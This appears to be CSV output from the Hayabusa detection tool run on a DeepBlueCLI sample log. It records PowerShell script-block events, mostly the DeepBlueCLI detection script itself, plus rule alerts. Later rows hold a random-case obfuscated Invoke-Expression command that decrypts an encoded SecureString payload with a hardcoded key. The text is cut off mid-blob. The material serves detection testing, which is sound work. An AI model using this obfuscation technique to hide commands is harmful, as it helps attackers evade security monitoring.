+2017-08-31 03:59:31.974 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"# Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""!"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ! characters`n"" } $string2 = $string -replace ""%"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars % characters`n"" } $string2 = $string -replace ""&"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars & characters`n"" } $string2 = $string -replace "">"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars > characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:59:31.977 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:59:31.985 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:59:31.987 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 04:01:22.441 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 04:01:22.441 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 04:01:22.442 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""!"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ! characters`n"" } $string2 = $string -replace ""%"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars % characters`n"" } $string2 = $string -replace ""&"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars & characters`n"" } $string2 = $string -replace "">"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars > characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 04:01:22.443 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 04:01:28.780 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 04:12:08.894 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 04:12:08.929 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 04:12:08.986 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 04:12:09.026 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 04:12:09.052 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 04:12:09.081 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 04:12:09.119 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 04:12:09.152 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 04:12:09.159 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 04:12:09.176 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 04:12:09.189 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 04:12:09.191 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 04:12:09.237 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 04:12:28.360 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"iNVOkE-expRessION (( [RUNTiMe.inTEROPsErVices.MARsHaL]::ptrTOsTRINgautO( [runTIME.IntErOPsERvIceS.MarSHAL]::SEcureSTRIngtObsTr($('76492d1116743f0423413b16050a5345MgB8AFEAcwB0AHAAaAAwAGEAWABRAG8AcgBMAEMAdAAyAFgANwAyAGsATABCAFEAPQA9AHwAZQBjADMAOAAxAGYAOAA4ADcANAA2ADIAYQAzADgANwBjADIANgAyAGYAYQA0ADYAYgBhADAANgBmADkAZgA4AGYAZQBiADQANgBlADAAYwAxADYAYwBmADIAZABhADEAMgA5ADQANwA0ADEAMAA1ADAAYQA1ADQAMwBmADAAMAAyAGEAYgBiADMAMQBhADgAMgBjADUAYQBkADcAMwBlADAAMQA4ADAANABiADEAYwA2AGQAOQAwADMAMgA0ADYAMgA5ADcAZgAwAGMAMwBkADUANABiAGYAOAAwADEAMQBmAGIAYQBhADAAOABiADIANwAxADQAMgAxADUANgAxADQAZgBlAGYAOQBiADQAMwAwADEAMAA3ADQAZQA3AGMAYgBkADQANQBlADAANwBkADYAYQBhADMAYwA1AGUAZQBhAGUANAAzADEANgBlAGQAOQA4ADcAMQAyADYAOABlADEAMgAxADkAYQBmADgANwBkAGIAOQBhADMAYgAzAGQAZAA1AGMANAA4ADcAZgBhAGYAYQBhAGUAZQBmAGIAOAA2ADAAMAAwADkAYgAwAGEAZgA1AGEAYwBmADUANgBjAGIAMQA5ADIAYQBmADYAYwAzADAAYwBlADYAYwA3AGIANQAxAGEAMQBlADMANwBjADYAMgBmAGQAZAAxADUAMAA0ADcAMQBiAGMAOQBkAGQAOAA5ADYAMwAwAGEAOQBjAGUANQAzADQANwA2ADkAZgAyAGYAOQA2ADgANgA2ADEAMQAxADkAYwBkADYAZQA2AGQAZABlAGEANgBlAGMAYwA0ADYANwBjAGMAYQAyADAAMQBmADUAZgA4ADUANAA4ADMANwA2AGYAOAAxADIAYQBhAGUAYgBjADMAYQAwADYAOQA5AGMAZQBjADkAOQAzADkAMQA0ADIANAAyAGEAZgAwAGUAYwA2ADIANwBlAGUANwBmADQANwBmADgAMgA2ADkANQAxAGMAMwBmAGQAMQA5ADMANwAzAGEAOAA0AGQANAA2AGIAZAA3ADQAYgAwAGIAMQAwADIAZgBkADMAYQBmADEAYgBiADkAYgAzADYAMQA5ADQANQA2ADQAMQA1ADcAMwA2ADYAMQA0ADAAMABlAGQANAAyADQAYQA2ADYAMwA0AGMAZQBiAGUAZQBkADUAYgAxADkANwBlAGMANgA1ADkANQAyADcAYQBmADYAYQA0ADYAMQBmAGUAOABkADEAOAAwAGMAMwBkAGUAYgBlAGEAMAAzADIAYgA1ADYAYQA5AGEAMABjADYAZAAwADQANABiAGYAZABjADMANwA0ADgAYwA1ADMAZQBjAGQAMQA4ADAAMQAwAGIAYQBhAGEAMAA1AGUAZgAyAGUAZABlAGMAMwA5ADkAMQAyADAAZgBjADgANwAyAGEANwA3ADcAOQA2AGUAZQBjADkAYwAwADIANQBjAGIAOAA2AGQAOQBkAGQAMQBjAGUANABlAGUAMABjADcAMQA3ADkANQAzAGQAOQA3AGUAYgBjAGEANgBmADMANwAxADYAMwBiAGMAYgA5ADQANQAxADQANAAxAGQAMABiADIAMQA0ADEAMQA3ADUAMAA4AGEAMAA4ADUAOABlADcAOABlADYANQA2ADQAZQAwADcANAA3ADYANQA5ADYAYQA5ADcANgAyADgANwAyADIAMwAyADEAZgA1ADkAYgBkADUANgA0AGEAMgBlAGEAYwBiADUAZQAwAGEANQAxAGEAOQAwADMANQA2ADYAMQBiAGMAYQA2ADgAMQA3ADAAOQBjADgAMwA5AGQAOQBhADUANgA1ADIAMABlADMAMgBiAGIAMwA4ADMAZAA5ADQAYwAxAGUANgBlADcANQBmAGIAOQAzADAANAAwAGMAZAA1AGQAYwA5AGEAMgA2ADcAMABjADcAOABhADQANgBiAGUAYQA4ADUAMgA='|CoNverTTo-secuReStriNG -k 82,189,200,92,184,235,46,38,211,250,202,240,198,208,70,100,210,121,211,227,2,148,77,154,149,200,93,130,24,30,119,255) ) )) )",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 04:12:28.360 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"iNVOkE-expRessION (( [RUNTiMe.inTEROPsErVices.MARsHaL]::ptrTOsTRINgautO( [runTIME.IntErOPsERvIceS.MarSHAL]::SEcureSTRIngtObsTr($('76492d1116743f0423413b16050a5345MgB8AFEAcwB0AHAAaAAwAGEAWABRAG8AcgBMAEMAdAAyAFgANwAyAGsATABCAFEAPQA9AHwAZQBjADMAOAAxAGYAOAA4ADcANAA2ADIAYQAzADgANwBjADIANgAyAGYAYQA0ADYAYgBhADAANgBmADkAZgA4AGYAZQBiADQANgBlADAAYwAxADYAYwBmADIAZABhADEAMgA5ADQANwA0ADEAMAA1ADAAYQA1ADQAMwBmADAAMAAyAGEAYgBiADMAMQBhADgAMgBjADUAYQBkADcAMwBlADAAMQA4ADAANABiADEAYwA2AGQAOQAwADMAMgA0ADYAMgA5ADcAZgAwAGMAMwBkADUANABiAGYAOAAwADEAMQBmAGIAYQBhADAAOABiADIANwAxADQAMgAxADUANgAxADQAZgBlAGYAOQBiADQAMwAwADEAMAA3ADQAZQA3AGMAYgBkADQANQBlADAANwBkADYAYQBhADMAYwA1AGUAZQBhAGUANAAzADEANgBlAGQAOQA4ADcAMQAyADYAOABlADEAMgAxADkAYQBmADgANwBkAGIAOQBhADMAYgAzAGQAZAA1AGMANAA4ADcAZgBhAGYAYQBhAGUAZQBmAGIAOAA2ADAAMAAwADkAYgAwAGEAZgA1AGEAYwBmADUANgBjAGIAMQA5ADIAYQBmADYAYwAzADAAYwBlADYAYwA3AGIANQAxAGEAMQBlADMANwBjADYAMgBmAGQAZAAxADUAMAA0ADcAMQBiAGMAOQBkAGQAOAA5ADYAMwAwAGEAOQBjAGUANQAzADQANwA2ADkAZgAyAGYAOQA2ADgANgA2ADEAMQAxADkAYwBkADYAZQA2AGQAZABlAGEANgBlAGMAYwA0ADYANwBjAGMAYQAyADAAMQBmADUAZgA4ADUANAA4ADMANwA2AGYAOAAxADIAYQBhAGUAYgBjADMAYQAwADYAOQA5AGMAZQBjADkAOQAzADkAMQA0AD